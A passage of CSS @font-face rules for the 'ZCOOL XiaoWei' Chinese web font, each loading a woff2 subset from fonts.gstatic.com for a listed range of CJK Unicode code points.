url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.35.woff2) format(\'woff2\');unicode-range: U+8b80, U+8b83, U+8b8a, U+8b8c, U+8b90, U+8b93, U+8b99-8b9a, U+8ba0, U+8ba3, U+8ba5-8ba7, U+8baa-8bac, U+8bb4-8bb5, U+8bb7, U+8bb9, U+8bc2-8bc3, U+8bc5, U+8bcb-8bcc, U+8bce-8bd0, U+8bd2-8bd4, U+8bd6, U+8bd8-8bd9, U+8bdc, U+8bdf, U+8be3-8be4, U+8be7-8be9, U+8beb-8bec, U+8bee, U+8bf0, U+8bf2-8bf3, U+8bf6, U+8bf9, U+8bfc-8bfd, U+8bff-8c00, U+8c02, U+8c04, U+8c06-8c07, U+8c0c, U+8c0f, U+8c11-8c12, U+8c14-8c1b, U+8c1d-8c21, U+8c24-8c25, U+8c27, U+8c2a-8c2c, U+8c2e-8c30, U+8c32-8c36, U+8c3f, U+8c47-8c4c, U+8c4e-8c50, U+8c54-8c56, U+8c62, U+8c68, U+8c6c, U+8c73, U+8c78, U+8c7a, U+8c82, U+8c85, U+8c89-8c8a, U+8c8d-8c8e, U+8c90, U+8c93-8c94, U+8c98, U+8c9d-8c9e, U+8ca0-8ca2, U+8ca7-8cac, U+8caf-8cb0, U+8cb3-8cb4, U+8cb6-8cb9, U+8cbb-8cbc;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.36.woff2) format(\'woff2\');unicode-range: U+8a15-8a18, U+8a1a-8a1b, U+8a1d, U+8a1f, U+8a22-8a23, U+8a25, U+8a2b, U+8a2d, U+8a31, U+8a33-8a34, U+8a36-8a38, U+8a3a, U+8a3c, U+8a3e, U+8a40-8a41, U+8a46, U+8a48, U+8a50, U+8a52, U+8a54-8a55, U+8a58, U+8a5b, U+8a5d-8a63, U+8a66, U+8a69-8a6b, U+8a6d-8a6e, U+8a70, U+8a72-8a73, U+8a7a, U+8a85, U+8a87, U+8a8a, U+8a8c-8a8d, U+8a90-8a92, U+8a95, U+8a98, U+8aa0-8aa1, U+8aa3-8aa6, U+8aa8-8aa9, U+8aac-8aae, U+8ab0, U+8ab2, U+8ab8-8ab9, U+8abc, U+8abe-8abf, U+8ac7, U+8acf, U+8ad2, U+8ad6-8ad7, U+8adb-8adc, U+8adf, U+8ae1, U+8ae6-8ae8, U+8aeb, U+8aed-8aee, U+8af1, U+8af3-8af4, U+8af7-8af8, U+8afa, U+8afe, U+8b00-8b02, U+8b07, U+8b0a, U+8b0c, U+8b0e, U+8b10, U+8b17, U+8b19, U+8b1b, U+8b1d, U+8b20-8b21, U+8b26, U+8b28, U+8b2c, U+8b33, U+8b39, U+8b3e-8b3f, U+8b41, U+8b45, U+8b49, U+8b4c, U+8b4f, U+8b57-8b58, U+8b5a, U+8b5c, U+8b5e, U+8b60, U+8b6c, U+8b6f-8b70, U+8b72, U+8b74, U+8b77, U+8b7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.37.woff2) format(\'woff2\');unicode-range: U+8882, U+8884-8886, U+8888, U+888f, U+8892-8893, U+889b, U+88a2, U+88a4, U+88a6, U+88a8, U+88aa, U+88ae, U+88b1, U+88b4, U+88b7, U+88bc, U+88c0, U+88c6-88c9, U+88ce-88cf, U+88d1-88d3, U+88d8, U+88db-88dd, U+88df, U+88e1-88e3, U+88e5, U+88e8, U+88ec, U+88f0-88f1, U+88f3-88f4, U+88fc-88fe, U+8900, U+8902, U+8906-8907, U+8909-890c, U+8912-8915, U+8918-891b, U+8921, U+8925, U+892b, U+8930, U+8932, U+8934, U+8936, U+893b, U+893d, U+8941, U+894c, U+8955-8956, U+8959, U+895c, U+895e-8960, U+8966, U+896a, U+896c, U+896f-8970, U+8972, U+897b, U+897e, U+8980, U+8983, U+8985, U+8987-8988, U+898c, U+898f, U+8993, U+8997, U+899a, U+89a1, U+89a7, U+89a9-89aa, U+89b2-89b3, U+89b7, U+89c0, U+89c7, U+89ca-89cc, U+89ce-89d1, U+89d6, U+89da, U+89dc, U+89de, U+89e5, U+89e7, U+89eb, U+89ef, U+89f1, U+89f3-89f4, U+89f8, U+89ff, U+8a01-8a03, U+8a07-8a0a, U+8a0e-8a0f, U+8a13;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.38.woff2) format(\'woff2\');unicode-range: U+86f4, U+86f8-86f9, U+86fb, U+86fe, U+8703, U+8706-870a, U+870d, U+8711-8713, U+871a, U+871e, U+8722-8723, U+8725, U+8729, U+872e, U+8731, U+8734, U+8737, U+873a-873b, U+873e-8740, U+8742, U+8747-8748, U+8753, U+8755, U+8757-8758, U+875d, U+875f, U+8762-8766, U+8768, U+876e, U+8770, U+8772, U+8775, U+8778, U+877b-877e, U+8782, U+8785, U+8788, U+878b, U+8793, U+8797, U+879a, U+879e-87a0, U+87a2-87a3, U+87a8, U+87ab-87ad, U+87af, U+87b3, U+87b5, U+87bd, U+87c0, U+87c4, U+87c6, U+87ca-87cb, U+87d1-87d2, U+87db-87dc, U+87de, U+87e0, U+87e5, U+87ea, U+87ec, U+87ee, U+87f2-87f3, U+87fb, U+87fd-87fe, U+8802-8803, U+8805, U+880a-880b, U+880d, U+8813-8816, U+8819, U+881b, U+881f, U+8821, U+8823, U+8831-8832, U+8835-8836, U+8839, U+883b-883c, U+8844, U+8846, U+884a, U+884e, U+8852-8853, U+8855, U+8859, U+885b, U+885d-885e, U+8862, U+8864, U+8869-886a, U+886e-886f, U+8872, U+8879, U+887d-887f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.39.woff2) format(\'woff2\');unicode-range: U+8548, U+854e, U+8553, U+8556-8557, U+8559, U+855e, U+8561, U+8564-8565, U+8568-856a, U+856d, U+856f-8570, U+8572, U+8576, U+8579-857b, U+8580, U+8585-8586, U+8588, U+858a, U+858f, U+8591, U+8594, U+8599, U+859c, U+85a2, U+85a4, U+85a6, U+85a8-85a9, U+85ab-85ac, U+85ae, U+85b7-85b9, U+85be, U+85c1, U+85c7, U+85cd, U+85d0, U+85d3, U+85d5, U+85dc-85dd, U+85df-85e0, U+85e5-85e6, U+85e8-85ea, U+85f4, U+85f9, U+85fe-85ff, U+8602, U+8605-8607, U+860a-860b, U+8616, U+8618, U+861a, U+8627, U+8629, U+862d, U+8638, U+863c, U+863f, U+864d, U+864f, U+8652-8655, U+865b-865c, U+865f, U+8662, U+8667, U+866c, U+866e, U+8671, U+8675, U+867a-867c, U+867f, U+868b, U+868d, U+8693, U+869c-869d, U+86a1, U+86a3-86a4, U+86a7-86a9, U+86ac, U+86af-86b1, U+86b4-86b6, U+86ba, U+86c0, U+86c4, U+86c6, U+86c9-86ca, U+86cd-86d1, U+86d4, U+86d8, U+86de-86df, U+86e4, U+86e6, U+86e9, U+86ed, U+86ef-86f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.40.woff2) format(\'woff2\');unicode-range: U+83c5, U+83c8-83c9, U+83cb, U+83d1, U+83d3-83d6, U+83d8, U+83db, U+83dd, U+83df, U+83e1, U+83e5, U+83ea-83eb, U+83f0, U+83f4, U+83f8-83f9, U+83fb, U+83fd, U+83ff, U+8401, U+8406, U+840a-840b, U+840f, U+8411, U+8418, U+841c, U+8420, U+8422-8424, U+8426, U+8429, U+842c, U+8438-8439, U+843b-843c, U+843f, U+8446-8447, U+8449, U+844e, U+8451-8452, U+8456, U+8459-845a, U+845c, U+8462, U+8466, U+846d, U+846f-8470, U+8473, U+8476-8478, U+847a, U+847d, U+8484-8485, U+8487, U+8489, U+848c, U+848e, U+8490, U+8493-8494, U+8497, U+849b, U+849e-849f, U+84a1, U+84a5, U+84a8, U+84af, U+84b4, U+84b9-84bf, U+84c1-84c2, U+84c5-84c7, U+84ca-84cb, U+84cd, U+84d0-84d1, U+84d3, U+84d6, U+84df-84e0, U+84e2-84e3, U+84e5-84e7, U+84ee, U+84f3, U+84f6, U+84fa, U+84fc, U+84ff-8500, U+850c, U+8511, U+8514-8515, U+8517-8518, U+851f, U+8523, U+8525-8526, U+8529, U+852b, U+852d, U+8532, U+8534-8535, U+8538-853a, U+853c, U+8543, U+8545;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.41.woff2) format(\'woff2\');unicode-range: U+82bc, U+82be, U+82c0-82c2, U+82c4-82c8, U+82ca-82cc, U+82ce, U+82d0, U+82d2-82d3, U+82d5-82d6, U+82d8-82d9, U+82dc-82de, U+82e0-82e4, U+82e7, U+82e9-82eb, U+82ed-82ee, U+82f3-82f4, U+82f7-82f8, U+82fa-8301, U+8306-8308, U+830c-830d, U+830f, U+8311, U+8313-8315, U+8318, U+831a-831b, U+831d, U+8324, U+8327, U+832a, U+832c-832d, U+832f, U+8331-8334, U+833a-833c, U+8340, U+8343-8345, U+8347-8348, U+834a, U+834c, U+834f, U+8351, U+8356, U+8358-835c, U+835e, U+8360, U+8364-8366, U+8368-836a, U+836c-836e, U+8373, U+8378, U+837b-837d, U+837f-8380, U+8382, U+8388, U+838a-838b, U+8392, U+8394, U+8396, U+8398-8399, U+839b-839c, U+83a0, U+83a2-83a3, U+83a8-83aa, U+83ae-83b0, U+83b3-83b4, U+83b6, U+83b8, U+83ba, U+83bc-83bd, U+83bf-83c0, U+83c2;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.42.woff2) format(\'woff2\');unicode-range: U+8166-8169, U+816b, U+816d, U+8171, U+8173-8174, U+8178, U+817c-817d, U+8182, U+8188, U+8191, U+8198-819b, U+81a0, U+81a3, U+81a5-81a6, U+81a9, U+81b6, U+81ba-81bb, U+81bd, U+81bf, U+81c1, U+81c3, U+81c6, U+81c9-81ca, U+81cc-81cd, U+81d1, U+81d3-81d4, U+81d8, U+81db-81dc, U+81de-81df, U+81e5, U+81e7-81e9, U+81eb-81ec, U+81ee-81ef, U+81f5, U+81f8, U+81fa, U+81fc, U+81fe, U+8200-8202, U+8204, U+8208-820a, U+820e-8210, U+8216-8218, U+821b-821c, U+8221-8224, U+8226-8228, U+822b, U+822d, U+822f, U+8232-8234, U+8237-8238, U+823a-823b, U+823e, U+8244, U+8249, U+824b, U+824f, U+8259-825a, U+825f, U+8266, U+8268, U+826e, U+8271, U+8276-8279, U+827d, U+827f, U+8283-8284, U+8288-828a, U+828d-8291, U+8293-8294, U+8296-8298, U+829f-82a1, U+82a3-82a4, U+82a7-82ab, U+82ae, U+82b0, U+82b2, U+82b4-82b6;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.43.woff2) format(\'woff2\');unicode-range: U+8016, U+8018-8019, U+801c, U+801e, U+8026-802a, U+8031, U+8034-8035, U+8037, U+8043, U+804b, U+804d, U+8052, U+8056, U+8059, U+805e, U+8061, U+8068-8069, U+806e-8074, U+8076-8078, U+807c-8080, U+8082, U+8084-8085, U+8088, U+808f, U+8093, U+809c, U+809f, U+80ab, U+80ad-80ae, U+80b1, U+80b6-80b8, U+80bc-80bd, U+80c2, U+80c4, U+80ca, U+80cd, U+80d1, U+80d4, U+80d7, U+80d9-80db, U+80dd, U+80e0, U+80e4-80e5, U+80e7-80ed, U+80ef-80f1, U+80f3-80f4, U+80fc, U+8101, U+8104-8105, U+8107-8108, U+810c-810e, U+8112-8115, U+8117-8119, U+811b-811f, U+8121-8130, U+8132-8134, U+8137, U+8139, U+813f-8140, U+8142, U+8146, U+8148, U+814d-814e, U+8151, U+8153, U+8158-815a, U+815e, U+8160;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.44.woff2) format(\'woff2\');unicode-range: U+7ef0-7ef2, U+7ef6, U+7efa-7efb, U+7efe, U+7f01-7f04, U+7f08, U+7f0a-7f12, U+7f17, U+7f19, U+7f1b-7f1c, U+7f1f, U+7f21-7f23, U+7f25-7f28, U+7f2a-7f33, U+7f35-7f37, U+7f3d, U+7f42, U+7f44-7f45, U+7f4c-7f4d, U+7f52, U+7f54, U+7f58-7f59, U+7f5d, U+7f5f-7f61, U+7f63, U+7f65, U+7f68, U+7f70-7f71, U+7f73-7f75, U+7f77, U+7f79, U+7f7d-7f7e, U+7f85-7f86, U+7f88-7f89, U+7f8b-7f8c, U+7f90-7f91, U+7f94-7f96, U+7f98-7f9b, U+7f9d, U+7f9f, U+7fa3, U+7fa7-7fa9, U+7fac-7fb2, U+7fb4, U+7fb6, U+7fb8, U+7fbc, U+7fbf-7fc0, U+7fc3, U+7fca, U+7fcc, U+7fce, U+7fd2, U+7fd5, U+7fd9-7fdb, U+7fdf, U+7fe3, U+7fe5-7fe7, U+7fe9, U+7feb-7fec, U+7fee-7fef, U+7ff1, U+7ff3-7ff4, U+7ff9-7ffa, U+7ffe, U+8004, U+8006, U+800b, U+800e, U+8011-8012, U+8014;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.45.woff2) format(\'woff2\');unicode-range: U+7dd2, U+7dd4, U+7dd6-7dd8, U+7dda-7de0, U+7de2-7de6, U+7de8-7ded, U+7def, U+7df1-7df5, U+7df7, U+7df9, U+7dfb-7dfc, U+7dfe-7e02, U+7e04, U+7e08-7e0b, U+7e12, U+7e1b, U+7e1e, U+7e20, U+7e22-7e23, U+7e26, U+7e29, U+7e2b, U+7e2e-7e2f, U+7e31, U+7e37, U+7e39-7e3e, U+7e40, U+7e43-7e44, U+7e46-7e47, U+7e4a-7e4b, U+7e4d-7e4e, U+7e51, U+7e54-7e56, U+7e58-7e5b, U+7e5d-7e5e, U+7e61, U+7e66-7e67, U+7e69-7e6b, U+7e6d, U+7e70, U+7e73, U+7e77, U+7e79, U+7e7b-7e7d, U+7e81-7e82, U+7e8c-7e8d, U+7e8f, U+7e92-7e94, U+7e96, U+7e98, U+7e9a-7e9c, U+7e9e-7e9f, U+7ea1, U+7ea3, U+7ea5, U+7ea8-7ea9, U+7eab, U+7ead-7eae, U+7eb0, U+7ebb, U+7ebe, U+7ec0-7ec2, U+7ec9, U+7ecb-7ecc, U+7ed0, U+7ed4, U+7ed7, U+7edb, U+7ee0-7ee2, U+7ee5-7ee6, U+7ee8, U+7eeb;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.46.woff2) format(\'woff2\');unicode-range: U+7ce8, U+7cec, U+7cf0, U+7cf5-7cf9, U+7cfc, U+7cfe, U+7d00, U+7d04-7d0b, U+7d0d, U+7d10-7d14, U+7d17-7d19, U+7d1b-7d1f, U+7d21, U+7d24-7d26, U+7d28-7d2a, U+7d2c-7d2e, U+7d30-7d31, U+7d33, U+7d35-7d36, U+7d38-7d3a, U+7d40, U+7d42-7d44, U+7d46, U+7d4b-7d4c, U+7d4f, U+7d51, U+7d54-7d56, U+7d58, U+7d5b-7d5c, U+7d5e, U+7d61-7d63, U+7d66, U+7d68, U+7d6a-7d6c, U+7d6f, U+7d71-7d73, U+7d75-7d77, U+7d79-7d7a, U+7d7e, U+7d81, U+7d84-7d8b, U+7d8d, U+7d8f, U+7d91, U+7d94, U+7d96, U+7d98-7d9a, U+7d9c-7da0, U+7da2, U+7da6, U+7daa-7db1, U+7db4-7db8, U+7dba-7dbf, U+7dc1, U+7dc4, U+7dc7-7dc8, U+7dca-7dcd, U+7dcf, U+7dd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.47.woff2) format(\'woff2\');unicode-range: U+7bd3-7bd4, U+7bd9-7bda, U+7bdd, U+7be0-7be1, U+7be4-7be6, U+7be9-7bea, U+7bef, U+7bf4, U+7bf6, U+7bfc, U+7bfe, U+7c01, U+7c03, U+7c07-7c08, U+7c0a-7c0d, U+7c0f, U+7c11, U+7c15-7c16, U+7c19, U+7c1e-7c21, U+7c23-7c24, U+7c26, U+7c28-7c33, U+7c35, U+7c37-7c3b, U+7c3d-7c3e, U+7c40-7c41, U+7c43, U+7c47-7c48, U+7c4c, U+7c50, U+7c53-7c54, U+7c59, U+7c5f-7c60, U+7c63-7c65, U+7c6c, U+7c6e, U+7c72, U+7c74, U+7c79-7c7a, U+7c7c, U+7c81-7c82, U+7c84-7c85, U+7c88, U+7c8a-7c91, U+7c93-7c96, U+7c99, U+7c9b-7c9e, U+7ca0-7ca2, U+7ca6-7ca9, U+7cac, U+7caf-7cb3, U+7cb5-7cb7, U+7cba-7cbd, U+7cbf-7cc2, U+7cc5, U+7cc7-7cc9, U+7ccc-7ccd, U+7cd7, U+7cdc, U+7cde, U+7ce0, U+7ce4-7ce5, U+7ce7;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.48.woff2) format(\'woff2\');unicode-range: U+7ae6, U+7af4-7af7, U+7afa-7afb, U+7afd-7b0a, U+7b0c, U+7b0e-7b0f, U+7b13, U+7b15-7b16, U+7b18-7b19, U+7b1e-7b20, U+7b22-7b25, U+7b29-7b2b, U+7b2d-7b2e, U+7b30-7b3b, U+7b3e-7b3f, U+7b41-7b42, U+7b44-7b47, U+7b4a, U+7b4c-7b50, U+7b58, U+7b5a, U+7b5c, U+7b60, U+7b66-7b67, U+7b69, U+7b6c-7b6f, U+7b72-7b76, U+7b7b-7b7d, U+7b7f, U+7b82, U+7b85, U+7b87, U+7b8b-7b96, U+7b98-7b99, U+7b9b-7b9f, U+7ba2-7ba4, U+7ba6-7bac, U+7bae-7bb0, U+7bb4, U+7bb7-7bb9, U+7bbb, U+7bc0-7bc1, U+7bc3-7bc4, U+7bc6, U+7bc8-7bcc, U+7bd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.49.woff2) format(\'woff2\');unicode-range: U+798b-798e, U+7992, U+7994-7995, U+7997-7998, U+799a-799c, U+799f, U+79a3-79a6, U+79a8-79ac, U+79ae-79b1, U+79b3-79b5, U+79b8, U+79ba, U+79bf, U+79c2, U+79c6, U+79c8, U+79cf, U+79d5-79d6, U+79dd-79de, U+79e3, U+79e7-79e8, U+79eb, U+79ed, U+79f4, U+79f7-79f8, U+79fa, U+79fe, U+7a02-7a03, U+7a05, U+7a0a, U+7a14, U+7a17, U+7a19, U+7a1c, U+7a1e-7a1f, U+7a23, U+7a25-7a26, U+7a2c, U+7a2e, U+7a30-7a32, U+7a36-7a37, U+7a39, U+7a3c, U+7a40, U+7a42, U+7a47, U+7a49, U+7a4c-7a4f, U+7a51, U+7a55, U+7a5b, U+7a5d-7a5e, U+7a62-7a63, U+7a66, U+7a68-7a69, U+7a6b, U+7a70, U+7a78, U+7a80, U+7a85-7a88, U+7a8a, U+7a90, U+7a93-7a96, U+7a98, U+7a9b-7a9c, U+7a9e, U+7aa0-7aa1, U+7aa3, U+7aa8-7aaa, U+7aac-7ab0, U+7ab3, U+7ab8, U+7aba, U+7abd-7abf, U+7ac4-7ac5, U+7ac7-7ac8, U+7aca, U+7ad1-7ad2, U+7ada-7add, U+7ae1, U+7ae4;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.50.woff2) format(\'woff2\');unicode-range: U+784c, U+784e-7854, U+7856-7857, U+7859-785a, U+7865, U+7869-786a, U+786d, U+786f, U+7876-7877, U+787c, U+787e-787f, U+7881, U+7887-7889, U+7893-7894, U+7898-789e, U+78a1, U+78a3, U+78a5, U+78a9, U+78ad, U+78b2, U+78b4, U+78b6, U+78b9-78ba, U+78bc, U+78bf, U+78c3, U+78c9, U+78cb, U+78d0-78d2, U+78d4, U+78d9-78da, U+78dc, U+78de, U+78e1, U+78e5-78e6, U+78ea, U+78ec, U+78ef, U+78f1-78f2, U+78f4, U+78fa-78fb, U+78fe, U+7901-7902, U+7905, U+7907, U+7909, U+790b-790c, U+790e, U+7910, U+7913, U+7919-791b, U+791e-791f, U+7921, U+7924, U+7926, U+792a-792b, U+7934, U+7936, U+7939, U+793b, U+793d, U+7940, U+7942-7943, U+7945-7947, U+7949-794a, U+794c, U+794e-7951, U+7953-7955, U+7957-795a, U+795c, U+795f-7960, U+7962, U+7964, U+7966-7967, U+7969, U+796b, U+796f, U+7972, U+7974, U+7979, U+797b-797c, U+797e-7980, U+7982, U+7986-7987, U+7989-798a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.51.woff2) format(\'woff2\');unicode-range: U+7722, U+7726, U+7728, U+772b-7730, U+7732-7736, U+7739-773a, U+773d-773f, U+7743, U+7746-7747, U+774c-774f, U+7751-7752, U+7758-775a, U+775c-775e, U+7762, U+7765-7766, U+7768-776a, U+776c-776d, U+7771-7772, U+777a, U+777c-777e, U+7780, U+7785, U+7787, U+778b-778d, U+778f-7791, U+7793, U+779e-77a0, U+77a2, U+77a5, U+77ad, U+77af, U+77b4-77b7, U+77bd-77c0, U+77c2, U+77c5, U+77c7, U+77cd, U+77d6-77d7, U+77d9-77da, U+77dd-77de, U+77e7, U+77ea, U+77ec, U+77ef, U+77f8, U+77fb, U+77fd-77fe, U+7800, U+7803, U+7806, U+7809, U+780f-7812, U+7815, U+7817-7818, U+781a-781f, U+7821-7823, U+7825-7827, U+7829, U+782b-7830, U+7832-7833, U+7835, U+7837, U+7839-783c, U+783e, U+7841-7844, U+7847-7849, U+784b;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.52.woff2) format(\'woff2\');unicode-range: U+7613-7619, U+761b-761d, U+761f-7622, U+7625, U+7627-762a, U+762e-7630, U+7632-7635, U+7638-763a, U+763c-763d, U+763f-7640, U+7642-7643, U+7647-7648, U+764d-764e, U+7652, U+7654, U+7658, U+765a, U+765c, U+765e-765f, U+7661-7663, U+7665, U+7669, U+766c, U+766e-766f, U+7671-7673, U+7675-7676, U+7678-767a, U+767f, U+7681, U+7683, U+7688, U+768a-768c, U+768e, U+7690-7692, U+7695, U+7698, U+769a-769b, U+769d-76a0, U+76a2, U+76a4-76a7, U+76ab-76ac, U+76af-76b0, U+76b2, U+76b4-76b5, U+76ba-76bb, U+76bf, U+76c2-76c3, U+76c5, U+76c9, U+76cc-76ce, U+76dc-76de, U+76e1-76ea, U+76f1, U+76f9-76fb, U+76fd, U+76ff-7700, U+7703-7704, U+7707-7708, U+770c-770f, U+7712, U+7714, U+7716, U+7719-771b, U+771e, U+7721;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.53.woff2) format(\'woff2\');unicode-range: U+750d, U+750f, U+7511, U+7513, U+7515, U+7517, U+7519, U+7521-7527, U+752a, U+752c-752d, U+752f, U+7534, U+7536, U+753a, U+753e, U+7540, U+7544, U+7547-754b, U+754d-754e, U+7550-7553, U+7556-7557, U+755a-755b, U+755d-755e, U+7560, U+7562, U+7564, U+7566-7568, U+756b-756c, U+756f-7573, U+7575, U+7579-757c, U+757e-757f, U+7581-7584, U+7587, U+7589-758e, U+7590, U+7592, U+7594, U+7596, U+7599-759a, U+759d, U+759f-75a0, U+75a3, U+75a5, U+75a8, U+75ac-75ad, U+75b0-75b1, U+75b3-75b5, U+75b8, U+75bd, U+75c1-75c4, U+75c8-75ca, U+75cc-75cd, U+75d4, U+75d6, U+75d9, U+75de, U+75e0, U+75e2-75e4, U+75e6-75ea, U+75f1-75f3, U+75f7, U+75f9-75fa, U+75fc, U+75fe-7601, U+7603, U+7605-7606, U+7608-760e, U+7610-7612;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.54.woff2) format(\'woff2\');unicode-range: U+73f0, U+73f2, U+73f4-73f5, U+73f7, U+73f9-73fa, U+73fc-73fd, U+73ff-7402, U+7404, U+7407-7408, U+740a-740f, U+7418, U+741a-741c, U+741e, U+7424-7425, U+7428-7429, U+742c-7430, U+7432, U+7435-7436, U+7438-743b, U+743e-7441, U+7443-7446, U+7448, U+744a-744b, U+7452, U+7457, U+745b, U+745d, U+7460, U+7462-7465, U+7467-746a, U+746d, U+746f, U+7471, U+7473-7474, U+7477, U+747a, U+747e, U+7481-7482, U+7484, U+7486, U+7488-748b, U+748e-748f, U+7493, U+7498, U+749a, U+749c-74a0, U+74a3, U+74a6, U+74a9-74aa, U+74ae, U+74b0-74b2, U+74b6, U+74b8-74ba, U+74bd, U+74bf, U+74c1, U+74c3, U+74c5, U+74c8, U+74ca, U+74cc, U+74cf, U+74d1-74d2, U+74d4-74d5, U+74d8-74db, U+74de-74e0, U+74e2, U+74e4-74e5, U+74e7-74e9, U+74ee-74ef, U+74f4, U+74ff, U+7501, U+7503, U+7505, U+7508;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.55.woff2) format(\'woff2\');unicode-range: U+72e6, U+72e8, U+72ef-72f0, U+72f2-72f4, U+72f6-72f7, U+72f9-72fb, U+72fd, U+7300-7304, U+7307, U+730a-730c, U+7313-7317, U+731d-7322, U+7327, U+7329, U+732c-732d, U+7330-7331, U+7333, U+7335-7337, U+7339, U+733d-733e, U+7340, U+7342, U+7344-7345, U+734a, U+734d-7350, U+7352, U+7355, U+7357, U+7359, U+735f-7360, U+7362-7363, U+7365, U+7368, U+736c-736d, U+736f-7370, U+7372, U+7374-7376, U+7378, U+737a-737b, U+737d-737e, U+7382-7383, U+7386, U+7388, U+738a, U+738c-7393, U+7395, U+7397-739a, U+739c, U+739e, 